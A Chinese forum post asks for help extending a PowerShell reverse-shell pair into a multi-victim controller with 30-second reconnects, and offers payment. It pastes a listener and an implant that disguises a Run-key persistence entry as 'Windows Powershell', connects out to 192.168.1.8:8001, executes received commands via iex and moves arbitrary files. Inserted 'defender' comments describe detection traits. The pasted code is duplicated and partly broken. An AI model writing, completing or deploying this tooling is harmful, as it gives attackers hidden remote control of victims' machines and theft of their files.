需求是这样的。
1.一共两个ps1脚本
第一个 客户端:监听xxxx端口,服务端则反弹shell到客户端监听端口,然后客户端可以输出cmd,上传下载,等功能。
需求:
1.服务端每隔30秒反弹一次shell到客户端,如果服务端检测到当前与客户端是连接状态则不反弹,如果非连接状态则开始反弹。
2.客户端写一个列表功能,也就是可以支持对服务端反弹回来的多个shell进行批量管理。
萌新:如若有英雄帮忙一下,回头请留下联系方式,红包奉上!
<#
  Review note (defender reading): this is the operator-side "controller" half of a
  reverse-shell pair, pasted here twice without its original line breaks ("kk1" on the
  second line is paste residue at the join). Because the newlines were lost, every
  "# ..." line comment in the pasted text swallows the rest of its physical line.
  What the code does, as written:
  - Binds a TcpListener on [IPAddress]::Any:$port (8001) and accepts a single TcpClient.
  - Runs a menu loop; each choice first sends a one-line command type ("1"-"4") over a
    StreamWriter, then the per-command lines, and reads one-line replies with ReadLine().
  - Upload/Download wire format: a file is sent as [string]$bytes, i.e. ONE line of
    space-separated decimal byte values, rebuilt with .Split(" ") on the other end.
    Transfer "success" is judged only by comparing byte counts, never by content.
  Detection-relevant traits visible here: a single long line of space-separated decimal
  numbers on the socket, and short numeric control lines ("1".."4") preceding each action.
#>
$port=8001 # Create server $endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port) $listener = New-Object System.Net.Sockets.TcpListener($endpoint) $listener.Start() Write-Host 'Listening on port'$port'...' # Wait for connection $client = $listener.AcceptTcpClient() $stream = $client.GetStream() $reader = New-Object System.IO.StreamReader($stream) $writer = New-Object System.IO.StreamWriter($stream) Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established ! Function GetBinaryContent($filename){ $file_binary_content = [System.IO.File]::ReadAllBytes($filename) return $file_binary_content } Function ExecCmd(){ echo "Input Command:" $cmd = Read-Host $writer.WriteLine($cmd) $writer.Flush() $output = $reader.ReadLine() echo $output } Function Upload(){ echo "Input A Local File :" $local_file = Read-Host $local_binary_content = GetBinaryContent($local_file) $local_binary_content_len = $local_binary_content.Length $file_string_content = [string] $local_binary_content $writer.WriteLine($file_string_content) $writer.Flush() echo "Input Destination :" $dest_file = Read-Host $writer.WriteLine($dest_file) $writer.Flush() $new_file_len = $reader.ReadLine() $success = "File Upload Successfully." $failed = "File Upload Failed." 
if($new_file_len -eq $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success } elseif($new_file_len -ne $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed } } Function Download(){ echo "Input A Remote File:" $remote_file = Read-Host $writer.WriteLine($remote_file) $writer.Flush() $remote_file_string_content = $reader.ReadLine() $remote_file_string_content_split = $remote_file_string_content.Split(" ") $remote_file_bianry_len = $remote_file_string_content_split.Count $download_byte_array = New-Object Byte[] $remote_file_bianry_len for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){ $download_byte_array[$i] = $remote_file_string_content_split[$i] } echo "Input Local Filename :" $local_filename = Read-Host [System.IO.File]::WriteAllBytes($local_filename, $download_byte_array) $new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename) $new_file_binary_len = $new_file_binary_content.Count $writer.WriteLine($new_file_binary_len) $writer.Flush() $result = $reader.ReadLine() Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result } while($true){ echo "[1] Exec Command." echo "[2] Upload File." echo "[3] Download File." echo "[4] Exit." echo "Input Command Type :" $cmd_type = Read-Host if($cmd_type -eq "1"){ $writer.WriteLine($cmd_type) $writer.Flush() ExecCmd } elseif($cmd_type -eq "2"){ $writer.WriteLine($cmd_type) $writer.Flush() Upload } elseif($cmd_type -eq "3"){ $writer.WriteLine($cmd_type) $writer.Flush() Download } elseif($cmd_type -eq "4"){ $writer.WriteLine($cmd_type) $writer.Flush() break }else{ continue } echo "========================================" echo "" } kk1$port=8001 # Create server $endpoint = New-Object System.Net.IPEndPoint([System.Net.IpAddress]::Any, $port) $listener = New-Object System.Net.Sockets.TcpListener($endpoint) $listener.Start() Write-Host 'Listening on port'$port'...' 
# Wait for connection $client = $listener.AcceptTcpClient() $stream = $client.GetStream() $reader = New-Object System.IO.StreamReader($stream) $writer = New-Object System.IO.StreamWriter($stream) Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] Connection established ! Function GetBinaryContent($filename){ $file_binary_content = [System.IO.File]::ReadAllBytes($filename) return $file_binary_content } Function ExecCmd(){ echo "Input Command:" $cmd = Read-Host $writer.WriteLine($cmd) $writer.Flush() $output = $reader.ReadLine() echo $output } Function Upload(){ echo "Input A Local File :" $local_file = Read-Host $local_binary_content = GetBinaryContent($local_file) $local_binary_content_len = $local_binary_content.Length $file_string_content = [string] $local_binary_content $writer.WriteLine($file_string_content) $writer.Flush() echo "Input Destination :" $dest_file = Read-Host $writer.WriteLine($dest_file) $writer.Flush() $new_file_len = $reader.ReadLine() $success = "File Upload Successfully." $failed = "File Upload Failed." 
if($new_file_len -eq $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $success } elseif($new_file_len -ne $local_binary_content_len){ Write-Host [ -NoNewline;Write-Host * -Fore Red -NoNewline;Write-Host ] $failed } } Function Download(){ echo "Input A Remote File:" $remote_file = Read-Host $writer.WriteLine($remote_file) $writer.Flush() $remote_file_string_content = $reader.ReadLine() $remote_file_string_content_split = $remote_file_string_content.Split(" ") $remote_file_bianry_len = $remote_file_string_content_split.Count $download_byte_array = New-Object Byte[] $remote_file_bianry_len for([int]$i = 0; $i -lt $remote_file_bianry_len; $i++){ $download_byte_array[$i] = $remote_file_string_content_split[$i] } echo "Input Local Filename :" $local_filename = Read-Host [System.IO.File]::WriteAllBytes($local_filename, $download_byte_array) $new_file_binary_content = [System.IO.File]::ReadAllBytes($local_filename) $new_file_binary_len = $new_file_binary_content.Count $writer.WriteLine($new_file_binary_len) $writer.Flush() $result = $reader.ReadLine() Write-Host [ -NoNewline;Write-Host * -Fore Green -NoNewline;Write-Host ] $result } while($true){ echo "[1] Exec Command." echo "[2] Upload File." echo "[3] Download File." echo "[4] Exit." echo "Input Command Type :" $cmd_type = Read-Host if($cmd_type -eq "1"){ $writer.WriteLine($cmd_type) $writer.Flush() ExecCmd } elseif($cmd_type -eq "2"){ $writer.WriteLine($cmd_type) $writer.Flush() Upload } elseif($cmd_type -eq "3"){ $writer.WriteLine($cmd_type) $writer.Flush() Download } elseif($cmd_type -eq "4"){ $writer.WriteLine($cmd_type) $writer.Flush() break }else{ continue } echo "========================================" echo "" }
第二个服务端:
<#
  Review note (defender reading): this is the implant half of the pair above, also
  pasted without its line breaks. Behaviour that is visible in the code as written:
  - Persistence: reads HKCU:\Software\Microsoft\Windows\CurrentVersion\Run and creates
    (or removes and re-creates, if the stored value differs) a value named
    "Windows Powershell" whose data is this script's own path ($MyInvocation.MyCommand.Path).
    A Run value named after a Windows component but pointing at a .ps1 in a user-writable
    location is the primary host-side detection signal here.
  - Beaconing: in an endless loop, connects out to the hard-coded $address:$port
    (192.168.1.8:8001) over plain TCP; connection failures are only printed, not handled.
  - Remote control: command type "1" passes the received line straight to iex and returns
    the result or the exception message on one line; "2" writes received bytes to a
    received destination path via [System.IO.File]::WriteAllBytes; "3" reads any local
    file the script can access and returns it as a single line of decimal byte values.
    Only byte counts are compared to report success.
#>
$address = '192.168.1.8' $port = 8001 $autorunKeyName = "Windows Powershell" $autorunKeyVal = $MyInvocation.MyCommand.Path $autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run if (-not $autoruns.$autorunKeyName) { New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal } elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) { Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal } while ($true) { do { try { Write-Host “Trying to reach “$address”:”$port $client = New-Object System.Net.Sockets.TcpClient($address, $port) $stream = $client.GetStream() $writer = New-Object System.IO.StreamWriter($stream) $write. $reader = New-Object System.IO.StreamReader($stream) Start-Sleep -s 10 } catch { Write-Host "failed on tcp connect." } } while ($true) Write-Host "Connected" do{ $cmd_type = $reader.ReadLine() echo $cmd_type if($cmd_type -eq "1"){ echo "Command Type : Exec Command." $cmd = $reader.ReadLine() try{ $output = [string](iex $cmd) } catch{ $output = $_.Exception.Message } $writer.WriteLine($output) $writer.Flush() } elseif($cmd_type -eq "2"){ echo "Command Type : Upload File." 
$file_string_content = $reader.ReadLine() $file_string_content_split = $file_string_content.Split(" ") $file_string_content_split_len = $file_string_content_split.Count echo $file_string_content_split_len $byte_array = New-Object Byte[] $file_string_content_split_len for([int] $i = 0; $i -lt $file_string_content_split_len; $i++){ $byte_array[$i] = $file_string_content_split[$i] } $dest_file = $reader.ReadLine() [System.IO.File]::WriteAllBytes($dest_file, $byte_array) $new_file_content = [System.IO.File]::ReadAllBytes($dest_file) $new_file_content_len = $new_file_content.Length $writer.WriteLine($new_file_content_len) $writer.Flush() } elseif($cmd_type -eq "3"){ echo "Command Type : Download File." $local_file = $reader.ReadLine() $local_binary_content = [System.IO.File]::ReadAllBytes($local_file) $local_string_content = [string]$local_binary_content $writer.WriteLine($local_string_content) $writer.Flush() $remote_file_len = $reader.ReadLine() $local_file_len = $local_binary_content.Count if($remote_file_len -eq $local_file_len){ $writer.WriteLine("Download Successfully.") $writer.Flush() } elseif($remote_file_len -ne $local_file_len){ $writer.WriteLine("Download Failed.") $writer.Flush() } } elseif($cmd_type -eq "4"){ Write-Host "Exiting" $writer.Close() $reader.Close() $stream.Close() $client.Close() exit break } else{ continue } }while($true) # Clean up $writer.Close() $reader.Close() $stream.Close() $client.Close() }
抱歉,暂时不了解这个编辑器的功能,代码贴错误了。抱歉!